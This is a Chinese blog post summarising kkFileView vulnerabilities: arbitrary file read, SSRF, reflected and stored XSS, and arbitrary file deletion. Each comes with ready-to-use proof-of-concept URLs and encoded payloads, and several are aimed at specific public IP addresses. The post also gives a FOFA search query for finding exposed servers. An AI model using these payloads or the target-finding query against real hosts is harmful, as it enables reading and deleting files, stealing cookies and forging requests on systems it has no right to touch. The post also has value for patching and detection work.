kkFileView漏洞总结

刺骨的言语ヽ痛彻心扉 2024-02-05 14:30 109阅读 0赞

0x00 kkFileview存在任意文件读取漏洞

漏洞描述

Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。

漏洞影响

kkFileview <=3.6.0

fofa查询

body=”kkFile View”

漏洞证明

c1d5bf3f57e1bb5a764b9df578c2aa4e.png

http://103.39.221.102:8012//getCorsFile?urlPath=file:///etc/passwd

090ff6a3d43ec9ad923668b41a874daa.png

0x01 kkFileView SSR 漏洞

洞描述

kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。

漏洞影响

kkFileview =v4.1.0

洞证明

be2c141e20c19c92bda06a524eaa447a.png

13ae59c6280411e50da0beadecafd2bf.png

http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

06c14b7898c0c5384253d36a393e8e68.png

daba469b7e728ea2079cd3cb8c5264f9.png

0x03 kkFileView XSS漏洞

漏洞描述

kkFileview v4.1.0存两处XSS漏洞,可能导致网站cookies泄露。

漏洞影响

kkFileview =v4.1.0

漏洞证明

http://www.baidu.com/test.txt">

编码base64:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==

url编码:

aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

poc1:

/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

/picturesPreview?urls= aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E

98a3cbe28e5e272327e1a952ef598fab.png

http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D

12a5eef2dd936b25a5ce7f6459d68b05.png

编码base64:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+

url编码:

PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

poc2:

/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

94750becf9bdf0f4d9ebce3fc164fc72.png

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述

kkFileview全版本存在文件解析漏洞,攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF,远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求

漏洞影响

kkFileView=4.1.0

漏洞证明

1、上传文件

f0062fe5ce10b1602630ebdcfbcb11df.png

8851d91cf4d509614852666c39dc089c.png

2、访问漏洞位置http://139.9.101.60:8012/demo/2.html

2ca87781b767d32e53e5d9412e78bf8a.png

696a9ab8f976d91b86109f76cc2c1848.png

2.文件包含:

https://file.keking.cn/demo/test1.js

image

访问: https://file.keking.cn/demo/test14.html image

0x05 kkFileView任意文件删除漏洞
漏洞描述

kkFileview v4.0.0存在任意文件删除漏洞,可能导致系统任意文件被删除

漏洞影响

kkFileview= v4.0.0

漏洞证明

/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)

a60181ceb4b54cc47a4a43ea320b64df.png

6874d5d63cc3aaf993b8a3e48eb086c4.png

发表评论

表情:
评论列表 (有 0 条评论,109人围观)

还没有评论,来说两句吧...

相关阅读

    相关 Shiro框架漏洞总结

    一、shiro框架简介: Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露

    相关 src漏洞类型总结

    这三类存在漏洞可能更大 越他娘丑的站,越有可能存在洞。 Asp aspx 存在漏洞的可能更大 登陆口没得验证码的可能存在 ![在这里插入图片描述][